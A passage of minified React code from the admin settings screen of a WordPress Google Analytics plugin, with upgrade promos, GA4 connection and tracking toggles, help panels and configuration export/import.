focus:ring-offset-2")},(0,e.createElement)("span",{className:"mx-2"},"Unlock Placeholders"),(0,e.createElement)(Ge,{className:"h-5 w-5","aria-hidden":"true"}))))}function gn(){return(0,e.createElement)("article",{className:o()("flex flex-col flex-1 justify-end w-full","relative","rounded-2xl p-6 lg:p-8","sm:flex sm:items-end","lg:items-end","shadow-xl hover:shadow-2xl","bg-brand-900")},(0,e.createElement)("header",{className:"text-start text-3xl font-bold tracking-tight text-white w-full"},(0,e.createElement)("img",{className:o()("object-cover w-28 h-auto mr-2"),src:$t}),"WooCommerce"),(0,e.createElement)("div",{className:"flex-1 w-full justify-self-end mt-3 xl:mt-32 mb-8"},(0,e.createElement)("p",{className:"text-xl font-semibold tracking-tight text-white"},"Track your WooCommerce Store in Google Analytics"," "),(0,e.createElement)("div",{className:"mt-2 text-base leading-7 text-white/70"},(0,e.createElement)("div",{className:"text-lg text-gray-300"},"How familiar are you with your customer journey? How does the conversion rate drop between adding items to the cart to starting the checkout process? How much of your revenue can you attribute to that guest blog post?"," "),(0,e.createElement)("div",{className:"text-lg text-gray-300 pt-2"},"If you want to start making data-driven decisions (instead of just guessing), then having a good Analytics system in place is where you should start."," "),(0,e.createElement)("div",{className:"text-lg text-gray-300 pt-2"},"Google Analytics is the default choice for most of us and makes perfect sense - you already track website visits so why not take it up a notch and use the advanced e-commerce features?"," "),(0,e.createElement)("div",{className:"text-lg text-gray-300 pt-2"},"Goal Tracker for Google Analytics can help you start tracking valuable information with just a few clicks."),(0,e.createElement)("ul",{className:"px-2 space-y-2 divide-y divide-white/10 my-4  text-gray-300"},(0,e.createElement)("li",null,"Track customer journey, from first click to final purchase."),(0,e.createElement)("li",null,"Seamlessly integrate your WooCommerce store with Google Analytics GA4."),(0,e.createElement)("li",null,"Goal Tracker will send out all the required events for the Purchase, and Checkout Journey reports."),(0,e.createElement)("li",null,"Enable Woo tracking with just a few clicks.")),(0,e.createElement)("div",{className:"text-white"},"Upgrade now to unlock enhanced eCommerce tracking for WooCommerce."))),(0,e.createElement)("footer",{className:"flex items-center"},(0,e.createElement)("a",{href:wpGoalTrackerGa.upgradeUrl,type:"button",className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent ","bg-white text-brand-primary","px-4 py-2","text-sm font-medium","shadow hover:shadow-xl","transform active:scale-75 hover:scale-110 transition-transform","hover:ring-2 hover:ring-white hover:ring-offset-2","focus:outline-none focus:ring-2 focus:ring-white focus:ring-offset-2")},(0,e.createElement)("span",{className:"mx-2"},"Track WooCommerce"),(0,e.createElement)(Ge,{className:"h-5 w-5","aria-hidden":"true"}))))}const xn=()=>{const t=()=>(0,e.createElement)(gn,null),a=()=>(0,e.createElement)(Nn,null),i=[()=>(0,e.createElement)(mn,null),()=>(0,e.createElement)(pn,null),()=>(0,e.createElement)(yn,null)],[u,s]=(0,r.useState)(!1),[l,c]=(0,r.useState)(!1),[L,M]=(0,r.useState)(i);return(0,r.useEffect)((()=>{const e=document.querySelector(".toplevel_page_wpcf7"),r=document.querySelector(".toplevel_page_woocommerce");let n=[...i];r&&(n=[t,...n]),e&&(n=[a,...n]),M(n)}),[]),(0,e.createElement)("div",{"data-component":"ProPromo",className:""},(0,e.createElement)("header",{className:"px-6 pt-6 pb-4 rounded-b-xl bg-white"},(0,e.createElement)("aside",{className:o()("flex flex-col flex-1 justify-end w-full","justify-between","rounded-2xl","p-8","lg:max-w-none","lg:flex-none lg:flex-col lg:items-start w-full","bg-white")},(0,e.createElement)("div",null,(0,e.createElement)("span",{"data-component":"tag",className:o()("bg-slate-500","text-white","text-xs px-2 py-1","rounded uppercase")},"PRO")),(0,e.createElement)("div",null,(0,e.createElement)("p",{className:"text-6xl font-semibold tracking-tight text-gray-900"},"Track More"),(0,e.createElement)("p",{className:"mt-2 text-6xl text-gray-600"},"Get More")),(0,e.createElement)("p",{className:"text-base mt-2"},"Upgrade to Goal Tracker Pro to unlock more features and become a Google Analytics power user.",(0,e.createElement)("a",{href:wpGoalTrackerGa.upgradeUrl,type:"button",className:o()("capitalize inline-flex","items-center justify-center","rounded-full","border border-transparent ","bg-brand-primary text-white","px-4 py-2","text-sm font-medium","shadow hover:shadow-xl","transform active:scale-75 hover:scale-110 transition-transform","hover:ring-2 hover:ring-white hover:ring-offset-2","focus:outline-none focus:ring-2 focus:ring-white focus:ring-offset-2","ml-4")},(0,e.createElement)("span",{className:"mx-2"},"Go Pro"),(0,e.createElement)(Ge,{className:"h-5 w-5","aria-hidden":"true"}))))),(0,e.createElement)("div",{className:o()("p-10","mx-auto mt-16","flex flex-col xl:flex-row gap-4 xl:gap-6 2xl:gap-8","lg:mx-0 lg:mt-10 lg:max-w-none lg:flex-row lg:items-end")},L.slice(0,3).map(((t,r)=>(0,e.createElement)(n().Fragment,{key:r},t())))))};let wn=(0,r.createContext)(null);function Tn(){let e=(0,r.useContext)(wn);if(null===e){let e=new Error("You used a <Label /> component, but it is not inside a relevant parent.");throw Error.captureStackTrace&&Error.captureStackTrace(e,Tn),e}return e}let En=Je((function(e,t){let r=gr(),{id:a=`headlessui-label-${r}`,passive:i=!1,...n}=e,u=Tn(),s=dt(t);ut((()=>u.register(a)),[a,u.register]);let l={ref:s,...u.props,id:a};return i&&("onClick"in l&&(delete l.htmlFor,delete l.onClick),"onClick"in n&&delete n.onClick),We({ourProps:l,theirProps:n,slot:u.slot||{},defaultTag:"label",name:u.name||"Label"})})),Sn=Object.assign(En,{}),Dn=(0,r.createContext)(null);Dn.displayName="GroupContext";let fn=r.Fragment,hn=Je((function(e,t){let a=gr(),{id:i=`headlessui-switch-${a}`,checked:n,defaultChecked:u=!1,onChange:s,name:l,value:o,...c}=e,L=(0,r.useContext)(Dn),M=(0,r.useRef)(null),d=dt(M,t,null===L?null:L.setSwitch),[j,m]=ri(n,s,u),N=ct((()=>null==m?void 0:m(!j))),y=ct((e=>{if(pr(e.currentTarget))return e.preventDefault();e.preventDefault(),N()})),p=ct((e=>{e.key===yr.Space?(e.preventDefault(),N()):e.key===yr.Enter&&function(e){var t;let r=null!=(t=null==e?void 0:e.form)?t:e.closest("form");if(r)for(let e of r.elements)if("INPUT"===e.tagName&&"submit"===e.type||"BUTTON"===e.tagName&&"submit"===e.type||"INPUT"===e.nodeName&&"image"===e.type)return void e.click()}(e.currentTarget)})),g=ct((e=>e.preventDefault())),x=(0,r.useMemo)((()=>({checked:j})),[j]),w={id:i,ref:d,role:"switch",type:Xa(e,M),tabIndex:0,"aria-checked":j,"aria-labelledby":null==L?void 0:L.labelledby,"aria-describedby":null==L?void 0:L.describedby,onClick:y,onKeyUp:p,onKeyPress:g},T=pt();return(0,r.useEffect)((()=>{var e;let t=null==(e=M.current)?void 0:e.closest("form");t&&void 0!==u&&T.addEventListener(t,"reset",(()=>{m(u)}))}),[M,m]),r.createElement(r.Fragment,null,null!=l&&j&&r.createElement(wr,{features:xr.Hidden,...Xe({as:"input",type:"checkbox",hidden:!0,readOnly:!0,checked:j,name:l,value:o})}),We({ourProps:w,theirProps:c,slot:x,defaultTag:"button",name:"Switch"}))})),In=Object.assign(hn,{Group:function(e){var t;let[a,i]=(0,r.useState)(null),[n,u]=function(){let[e,t]=(0,r.useState)([]);return[e.length>0?e.join(" "):void 0,(0,r.useMemo)((()=>function(e){let a=ct((e=>(t((t=>[...t,e])),()=>t((t=>{let r=t.slice(),a=r.indexOf(e);return-1!==a&&r.splice(a,1),r}))))),i=(0,r.useMemo)((()=>({register:a,slot:e.slot,name:e.name,props:e.props})),[a,e.slot,e.name,e.props]);return r.createElement(wn.Provider,{value:i},e.children)}),[t])]}(),[s,l]=ta(),o=(0,r.useMemo)((()=>({switch:a,setSwitch:i,labelledby:n,describedby:s})),[a,i,n,s]),c=e;return r.createElement(l,{name:"Switch.Description"},r.createElement(u,{name:"Switch.Label",props:{htmlFor:null==(t=o.switch)?void 0:t.id,onClick(e){a&&("LABEL"===e.currentTarget.tagName&&e.preventDefault(),a.click(),a.focus({preventScroll:!0}))}}},r.createElement(Dn.Provider,{value:o},We({ourProps:{},theirProps:c,defaultTag:fn,name:"Switch.Group"}))))},Label:Sn,Description:aa});const{apiFetch:Cn}=wp,zn=(0,r.createContext)(void 0),bn=t=>{let{children:a}=t;const[i,n]=(0,r.useState)(!1),[u,s]=(0,r.useState)(""),[l,o]=(0,r.useState)(!1),[L,M]=(0,r.useState)(!1),[d,j]=(0,r.useState)(""),[m,N]=(0,r.useState)(!1),[y,p]=(0,r.useState)(!1),[g,x]=(0,r.useState)(!1),[w,T]=(0,r.useState)(!1),E=(0,r.useContext)(c);if(!E)throw new Error("ChildComponent must be used within a TabContextProvider");const{updateHasIssueByName:S}=E;(0,r.useEffect)((()=>{(async()=>{await f()})()}),[]);const D=e=>{e&&(j(e.measurementID),n(e.trackLinks.enabled),e.trackLinks&&e.trackLinks.enabled&&e.trackLinks.type&&s(e.trackLinks.type),o(e.trackEmailLinks),M(e.disableTrackingForAdmins),N(e.gaDebug),p(e.disablePageView),x(e.noSnippet),e.hideGeneralSettingsTutorial||T(!e.hideGeneralSettingsTutorial)),""===e.measurementID&&!1===e.noSnippet&&S("Settings",!0)},f=async()=>{let e=await Cn({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/get_general_settings"});return D(e||{}),e};return(0,e.createElement)(zn.Provider,{value:{trackLinks:i,setTrackLinks:n,trackLinksType:u,setTrackLinksType:s,trackEmailLinks:l,setTrackEmailLinks:o,disableTrackingForAdmins:L,setDisableTrackingForAdmins:M,measurementID:d,setMeasurementID:j,gaDebug:m,setGaDebug:N,disablePageView:y,setDisablePageView:p,noSnippet:g,setNoSnippet:x,showTutorial:w,setShowTutorial:T,setSettings:async e=>{e.preventDefault();const t={measurementID:d,gaDebug:m,disablePageView:y,noSnippet:g,trackLinks:{enabled:i,type:u||"all"},trackEmailLinks:l,disableTrackingForAdmins:L};await Cn({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/set_general_settings",method:"POST",data:{generalSettings:t}})},getSettings:f,updateSettings:D}},a)},On=i.p+"images/DebugViewHelp.d6e18691.png",vn=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"DebugView"),(0,e.createElement)("span",{className:"block pt-5"},"The Debug View Integration feature is a helpful tool that lets you enable the GA4 Debug View for your website. This feature allows you to see real-time data from your website's events in Google Analytics, making it easier to test and troubleshoot your tracking setup. With Debug View, you can confirm if your events are being sent correctly and ensure that your data is accurate before you start analyzing it.",(0,e.createElement)("p",null,"We do not recommend toggling this off once you are done testing.")),(0,e.createElement)("img",{className:"pt-5",src:On}),(0,e.createElement)("span",{className:"block pt-5 pb-5"},"To enable Debug View:",(0,e.createElement)("p",null),(0,e.createElement)("ol",{className:"list-decimal pt-5 list-inside ml-4"},(0,e.createElement)("li",{className:"mb-2"},"Toggle the DebugView option"),(0,e.createElement)("li",{className:"mb-2"},"Visit your website and interact with the elements you're tracking"),(0,e.createElement)("li",{className:"mb-2"},"Go to your Google Analytics account "),(0,e.createElement)("li",{className:"mb-2"},'Locate the "Admin" button at the bottom left corner and click on it'),(0,e.createElement)("li",{className:"mb-2"},'Click on "DebugView" in the "Property" column'),(0,e.createElement)("li",{className:"mb-2"},"Watch as events start showing on the screen")))),kn=i.p+"images/help-measurement-id.2f22bbe3.png",An=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Measurement Id"),(0,e.createElement)("span",{className:"block pt-5"},'The GA4 Measurement ID is a special code that helps Goal Tracker for Google Analytics plugin connect your WordPress website to Google Analytics 4. This code allows you to collect important information about how people interact with your website. The Measurement ID is a short code that begins with "G-" and is followed by a mix of numbers and letters.'),(0,e.createElement)("img",{className:"block pt-5",src:kn}),(0,e.createElement)("span",{className:"block pt-5 pb-5"},"To find your GA4 Measurement ID, follow these steps:",(0,e.createElement)("ol",{className:"list-decimal pt-5 list-inside ml-4"},(0,e.createElement)("li",{className:"mb-2"},"Sign in to your Google Analytics account"),(0,e.createElement)("li",{className:"mb-2"},'Locate the "Admin" button at the bottom left corner and click on it'),(0,e.createElement)("li",{className:"mb-2"},"Choose the appropriate account and property"),(0,e.createElement)("li",{className:"mb-2"},'Click on "Data Streams" in the "Property" column'),(0,e.createElement)("li",{className:"mb-2"},'Select the data stream labeled "Web"'),(0,e.createElement)("li",{className:"mb-2"},"Find your Measurement ID at the top of the opened page"),(0,e.createElement)("li",{className:"mb-2"},"Copy the code and paste it into the Goal Tracker for Google Analytics plugin settings on your WordPress site")))),Yn=()=>(0,e.createElement)("div",null,(0,e.createElement)(An,null),(0,e.createElement)(vn,null)),Un=i.p+"images/GoogleTagManagerHelp.389572fe.png",Qn=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Goal Tracker and Google Tag Manager"),(0,e.createElement)("span",{className:"block pt-5"},(0,e.createElement)("p",null,'If you are already using Google Tag Manager to track page views on the website, we recommend toggling the "Disable page_view Tracking " option in Goal Tracker.'),(0,e.createElement)("p",null,"The reason is that we want to make sure that you are not sending two page view events every time the page loads.")),(0,e.createElement)("span",{className:"block pt-5 pb-5"},"How can you tell if Google Tag Manager is configured to track page views?",(0,e.createElement)("ol",{className:"list-decimal pt-5 list-inside ml-4"},(0,e.createElement)("li",{className:"mb-2"},"Open Google Tag Manager and go to the tags page"),(0,e.createElement)("li",{className:"mb-2"},'Search for a tag of type "Google Analytics: GA4 Configuration" and click it'),(0,e.createElement)("li",{className:"mb-2"},"Click on the tag configuration "),(0,e.createElement)("li",{className:"mb-2"},'Check if the "Send a page view event when this configuration loads" box has been clicked. If it did then it means that you are using Google Tag Manager to track page views.'))),(0,e.createElement)("img",{className:"pt-5",src:Un}))),Gn=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Working with third-party Google Analytics plugins"),(0,e.createElement)("span",{className:"block pt-5"},(0,e.createElement)("p",null,'At times, there may be conflicts between our plugin and third-party Google Analytics plugins. In such cases, it is advisable to consider toggling the "Don\'t add the "gtag" code snippet" option.'),(0,e.createElement)("p",null,"When you toggle the option, our plugin will try to work with existing tags on the page."),(0,e.createElement)("p",null,"However, this means that our plugin is limited in how it can configure the integration with Google Analytics. The following features will not be available:")),(0,e.createElement)("span",{className:"block pt-5 pb-5"},(0,e.createElement)("ol",{className:"list-decimal list-inside ml-4"},(0,e.createElement)("li",{className:"mb-2"},"DebugView"),(0,e.createElement)("li",{className:"mb-2"},"Disabling Page View Tracking"),(0,e.createElement)("li",{className:"mb-2"},"User Tracking - Pro feature"),(0,e.createElement)("li",{className:"mb-2"},"Multiple Trackers - Pro feature"))))),Pn=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Email Links Tracking"),(0,e.createElement)("span",{className:"block pt-5"},"The Email Link Tracking feature in Goal Tracker for Google Analytics specifically tracks email links (mailto:) on your website. It uses the event name ",(0,e.createElement)("code",null,"email_link_click"),' to help you monitor and analyze user interactions with email links. To enable this feature, you need to perform two steps: toggle the feature in the plugin and create a custom dimension "email address" in Google Analytics.'),(0,e.createElement)("span",{className:"block pt-5"},"Follow these steps to enable Email Link Tracking:"),(0,e.createElement)("span",{className:"block pt-5"},(0,e.createElement)("ol",{className:"list-decimal list-inside"},(0,e.createElement)("li",{className:"mb-2"},"Navigate to the Goal Tracker for Google Analytics plugin settings in your WordPress dashboard"),(0,e.createElement)("li",{className:"mb-2"},'Find the "Email Link Tracking" toggle switch and turn it on'),(0,e.createElement)("li",{className:"mb-4"},'Sign in to your Google Analytics account and access the "Admin" section'),(0,e.createElement)("li",{className:"mb-2"},'Under the "Property" column, click on "Custom Definitions" and then "Custom Dimensions"'),(0,e.createElement)("li",{className:"mb-2"},'Click on "Create Custom Dimension" and name it "email address"'),(0,e.createElement)("li",{className:"mb-2"},'Set the "Scope" to "Event" and click on "Create"'))),(0,e.createElement)("span",{className:"block pt-5"},(0,e.createElement)("p",null,"Once you have completed these steps, the plugin will automatically track clicks on email links and send the event data to your Google Analytics 4 property under the event name"," ",(0,e.createElement)("code",null,"email_link_click"),'. The custom dimension "email address" will provide additional insights into the email addresses users interact with on your website.'),(0,e.createElement)("a",{className:"pt-5 font-medium text-blue-600 dark:text-blue-500 hover:underline",target:"_blank",href:"https://www.wpgoaltracker.com/tracking-email-links-with-goal-tracker-for-google-analytics/"},"Click here to learn more about email link tracking."))),Rn=()=>(0,e.createElement)("div",null,(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Link Tracking"),(0,e.createElement)("span",{className:"block pt-5"},"Goal Tracker for Google Analytics offers an improved Link Tracking feature as an alternative to GA4's Enhanced Analytics. This feature allows you to track both internal and external links using the event name ",(0,e.createElement)("code",null,"link_click"),", making it more convenient and efficient to work with compared to the standard GA4 implementation."),(0,e.createElement)("span",{className:"block pt-5"},'To enable the link tracking feature, toggle the Track Links option and then select "Track All Links" to track all the links (both internal and external) on the website, or "Track External Links" to track internal links.'),(0,e.createElement)("span",{className:"block pt-5 pb-5"},(0,e.createElement)("a",{className:"font-medium text-blue-600 dark:text-blue-500 hover:underline",target:"_blank",href:"https://www.wpgoaltracker.com/tracking-links-with-goal-tracker-for-google-analytics/"},"Click here to learn more about link tracking."))),Fn=()=>(0,e.createElement)("div",{className:"mt-5"},(0,e.createElement)("div",{className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"},"Page Speed Tracking (Load Time) ",(0,e.createElement)(Qt,null)),(0,e.createElement)("span",{className:"block pt-5"},"The Page Speed Tracking feature allows you to monitor the load time of your website pages. It uses the event name ",(0,e.createElement)("code",null,"page_load_time")," ","to help you analyze the performance of your website. To enable this feature, you need to toggle the option."),(0,e.createElement)("span",{className:"block pt-5"},"Tracking Load time will help you understand how your website performs and how individual pages compare to each other. This will help you identify slow pages and optimize them to improve the user experience."),(0,e.createElement)("span",{className:"block pt-5"},'After enabling the feature, head over to Google Analytics and create the "page_load_time" custom metric. You can find the instructions here:',(0,e.createElement)("a",{className:"pt-5 font-medium text-blue-600 dark:text-blue-500 hover:underline",href:"https://www.wpgoaltracker.com/q7lx"},"Page Speed Tracking in Google Analytics")),(0,e.createElement)("span",{className:"block pt-5"},(0,e.createElement)("a",{className:"pt-5 font-medium text-blue-600 dark:text-blue-500 hover:underline",target:"_blank",href:"https://www.wpgoaltracker.com/q7lx"},"Click here to learn more about Page Speed tracking."))),qn=()=>(0,e.createElement)("div",null,(0,e.createElement)(Rn,null),(0,e.createElement)(Pn,null),(0,e.createElement)(Fn,null)),Bn=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:2,stroke:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M4 16v1a3 3 0 003 3h10a3 3 0 003-3v-1m-4-4l-4 4m0 0l-4-4m4 4V4"}))})),Zn=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:2,stroke:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M4 16v1a3 3 0 003 3h10a3 3 0 003-3v-1m-4-8l-4-4m0 0L8 8m4-4v12"}))})),{apiFetch:Wn}=wp;function Hn(t){let{getSettings:a,setShowImportNotification:i}=t;const[n,u]=(0,r.useState)(!1),s=(0,r.useRef)(null);return(0,e.createElement)(e.Fragment,null,(0,e.createElement)(Rt,null,(0,e.createElement)(Vt,{title:"Configuration backup",titleHelper:"Export / import configuration file",children:void 0}),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:"Export Configuration",description:"Back up your plugin's settings",id:"",isPrimary:!1},(0,e.createElement)("button",{className:"flex-1 flex items-center text-white bg-brand-primary hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500 font-bold py-2 px-4 rounded",onClick:async()=>{const e=await(async()=>await Wn({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/get_entire_config"}))(),t=JSON.stringify(e,null,2),r=new Blob([t],{type:"application/json"}),a=URL.createObjectURL(r),i=`goal-tracker-config-${(new Date).toISOString().slice(0,10).replace(/-/g,"")}.json`,n=document.createElement("a");n.href=a,n.download=i,document.body.appendChild(n),n.click(),document.body.removeChild(n)}},(0,e.createElement)(Bn,{className:"h-5 w-5 text-white-400 mr-2","aria-hidden":"true"}),(0,e.createElement)("span",null,"Download Settings"))),(0,e.createElement)(Gt,{label:"Import Configuration",description:"Restore configuration from backup file",id:"",isPrimary:!1}," ",(0,e.createElement)("button",{className:"flex-1 flex items-center text-white bg-brand-primary hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500 font-bold py-2 px-4 rounded",onClick:()=>{s.current.click()}},(0,e.createElement)(Zn,{className:"h-5 w-5 text-white-400 mr-2","aria-hidden":"true"}),(0,e.createElement)("span",null,"Upload Settings")),(0,e.createElement)("input",{type:"file",ref:s,style:{display:"none"},onChange:e=>{const t=e.target.files[0];if(!t)return;const r=new FileReader;r.onload=async e=>{try{const t=JSON.parse(e.target.result);await(async e=>{let t=await Wn({path:wpGoalTrackerGa.rest.namespace+wpGoalTrackerGa.rest.version+"/set_entire_config",method:"POST",data:{config:e}});return await a(),t})(t),i("success")}catch(e){i("failure")}},r.readAsText(t)}})))))}const Vn=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:2,stroke:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M9 12l2 2 4-4M7.835 4.697a3.42 3.42 0 001.946-.806 3.42 3.42 0 014.438 0 3.42 3.42 0 001.946.806 3.42 3.42 0 013.138 3.138 3.42 3.42 0 00.806 1.946 3.42 3.42 0 010 4.438 3.42 3.42 0 00-.806 1.946 3.42 3.42 0 01-3.138 3.138 3.42 3.42 0 00-1.946.806 3.42 3.42 0 01-4.438 0 3.42 3.42 0 00-1.946-.806 3.42 3.42 0 01-3.138-3.138 3.42 3.42 0 00-.806-1.946 3.42 3.42 0 010-4.438 3.42 3.42 0 00.806-1.946 3.42 3.42 0 013.138-3.138z"}))})),Jn=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:2,stroke:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"M18.364 18.364A9 9 0 005.636 5.636m12.728 12.728A9 9 0 015.636 5.636m12.728 12.728L5.636 5.636"}))}));function Xn(t){let{showNotification:a}=t;const[i,n]=(0,r.useState)(!!a);return(0,r.useEffect)((()=>{n(!!a)}),[a]),(0,e.createElement)(r.Fragment,null,(0,e.createElement)("div",{"aria-live":"assertive",className:"pointer-events-none fixed inset-0 flex items-end px-4 py-6 sm:items-start sm:p-6"},(0,e.createElement)("div",{className:"flex w-full flex-col items-center space-y-4 sm:items-end"},(0,e.createElement)(vt,{show:i,as:r.Fragment,enter:"transform ease-out duration-300 transition",enterFrom:"translate-y-2 opacity-0 sm:translate-y-0 sm:translate-x-2",enterTo:"translate-y-0 opacity-100 sm:translate-x-0",leave:"transition ease-in duration-100",leaveFrom:"opacity-100",leaveTo:"opacity-0"},(0,e.createElement)("div",{className:"pointer-events-auto w-full max-w-sm overflow-hidden rounded-lg bg-white shadow-lg ring-1 ring-black ring-opacity-5"},(0,e.createElement)("div",{className:"p-4"},(0,e.createElement)("div",{className:"flex items-start"},(0,e.createElement)("div",{className:"flex-shrink-0"},"success"==a?(0,e.createElement)(Vn,{className:"h-6 w-6 text-green-400","aria-hidden":"true"}):(0,e.createElement)(Jn,{className:"h-6 w-6 text-red-400","aria-hidden":"true"})),(0,e.createElement)("div",{className:"ml-3 w-0 flex-1 pt-0.5"},(0,e.createElement)("p",{className:"text-sm font-medium text-gray-900"},"success"==a?"Import Successful":"Failed to read the configuration file")),(0,e.createElement)("div",{className:"ml-4 flex flex-shrink-0"},(0,e.createElement)("button",{type:"button",className:"inline-flex rounded-md bg-white text-gray-400 hover:text-gray-500 focus:outline-none focus:ring-2 focus:ring-indigo-500 focus:ring-offset-2",onClick:()=>{n(!1)}},(0,e.createElement)("span",{className:"sr-only"},"Close"),(0,e.createElement)(At,{className:"h-5 w-5","aria-hidden":"true"}))))))))))}const{useEffect:Kn,useRef:$n}=wp.element,{apiFetch:eu}=wp,{isEqual:tu}=lodash,ru=()=>{const{trackLinks:t,setTrackLinks:a,trackLinksType:i,setTrackLinksType:n,trackEmailLinks:u,setTrackEmailLinks:s,disableTrackingForAdmins:l,setDisableTrackingForAdmins:c,measurementID:L,setMeasurementID:M,gaDebug:d,setGaDebug:j,disablePageView:m,setDisablePageView:N,noSnippet:y,showTutorial:p,setShowTutorial:g,setNoSnippet:x,setSettings:w,getSettings:T,updateSettings:E}=(()=>{const e=(0,r.useContext)(zn);if(!e)throw new Error("useGeneralSettings must be used within a GeneralSettingsProvider");return e})(),[S,D]=(0,r.useState)(!1),[f,h]=(0,r.useState)(!1),[I,C]=(0,r.useState)(!1),[z,b]=(0,r.useState)(!1),[O,v]=(0,r.useState)(""),{showPromo:k,setShowPromo:A}=lr();var Y;return(0,r.useEffect)((()=>{(async()=>{await T(),A(""!==L||!y)})()}),[]),(0,r.useEffect)((()=>{b(!0)}),[t,i,u,l,L]),((e,t)=>{const r=$n(!0);Kn((()=>{r.current&&(r.current=!1)}),void 0)})(),Y=()=>{},Kn((()=>Y),[]),(0,e.createElement)("div",{className:"bg-white/75"},(0,e.createElement)(Ut,{showTutorial:p,showCloseButton:!0}),(0,e.createElement)("form",{onSubmit:w,className:"bg-white/50 p-5 rounded shadow-xl"},(0,e.createElement)("div",{"data-component":"SectionContainer",className:"space-y-8 sm:space-y-5"},(0,e.createElement)(Rt,null,(0,e.createElement)(Vt,{title:"Connect With Google Analytics 4",titleHelper:"Let's connect with Google Analytics GA4.\n              Our plugin will install the Google Analytics GA4 code on your website using these settings.",helpComponent:Yn,helpTitle:"Connecting with Google Analytics"}),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:"MEASUREMENT ID",id:"measurementID",description:"A Measurement ID is a Google Analytics unique identifier (e.g., G-12345) for your website",isPrimary:!1},(0,e.createElement)("div",{className:"max-w-xs flex rounded-md shadow-sm"},(0,e.createElement)("input",{type:"text",name:"measurementID",placeholder:"G-XXXXXXXXXX",id:"measurementID",value:L,onChange:e=>M(e.target.value),className:o()("flex-1 block w-full","focus:ring-brand-primary focus:border-brand-primary-focus","min-w-0 rounded-none","text-sm md:text-2xl","border-gray-300")}))),(0,e.createElement)(Gt,{label:"Enable GA4 Debug View",id:"",description:"",isPrimary:!1},(0,e.createElement)(In,{id:"gaDebug",name:"gaDebug",checked:d,onChange:j,className:o()(d?"bg-brand-primary":"bg-slate-500","relative inline-flex flex-shrink-0 h-6 w-11 border-2 border-transparent rounded-full cursor-pointer transition-colors ease-in-out duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500")},(0,e.createElement)("span",{className:"sr-only"},"GA4 Debug View"),(0,e.createElement)("span",{"aria-hidden":"true",className:o()(d?"translate-x-5":"translate-x-0","pointer-events-none inline-block h-5 w-5 rounded-full bg-white shadow transform ring-0 transition ease-in-out duration-200")}))))),(0,e.createElement)(Rt,null,(0,e.createElement)(Vt,{title:"Google Tag Manager",titleHelper:"If you are using Google Tag Manager, you may want to check one of the following.",helpComponent:Qn,helpTitle:"Google Tag Manager"}),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:"Disable page_view Tracking",description:"Useful when tracking page views through Google Tag Manager",id:"",isPrimary:!1},(0,e.createElement)(In,{id:"disablePageView",name:"disablePageView",checked:m,onChange:N,className:o()(m?"bg-brand-primary":"bg-slate-500","relative inline-flex flex-shrink-0 h-6 w-11 border-2 border-transparent rounded-full cursor-pointer transition-colors ease-in-out duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500")},(0,e.createElement)("span",{className:"sr-only"},"Use setting"),(0,e.createElement)("span",{"aria-hidden":"true",className:o()(m?"translate-x-5":"translate-x-0","pointer-events-none inline-block h-5 w-5 rounded-full bg-white shadow transform ring-0 transition ease-in-out duration-200")}))))),(0,e.createElement)(Rt,null,(0,e.createElement)(Vt,{title:"Third party Google Analytics plugins",titleHelper:"If you are using other Google Analytics plugins, you may want to check one of the following.",helpComponent:Gn,helpTitle:"Third party Google Analytics plugins"}),(0,e.createElement)(Pt,null,(0,e.createElement)(Gt,{label:'Don\'t add the "gtag" code snippet',description:"Useful when using third-party GA plugins",id:"",isPrimary:!1},(0,e.createElement)(In,{id:"noSnippet",name:"noSnippet",checked:y,onChange:x,className:o()(y?"bg-brand-primary":"bg-slate-500","relative inline-flex flex-shrink-0 h-6 w-11 border-2 border-transparent rounded-full cursor-pointer transition-colors ease-in-out duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500")},(0,e.createElement)("span",{className:"sr-only"},"Use setting"),(0,e.createElement)("span",{"aria-hidden":"true",className:o()(y?"translate-x-5":"translate-x-0","pointer-events-none 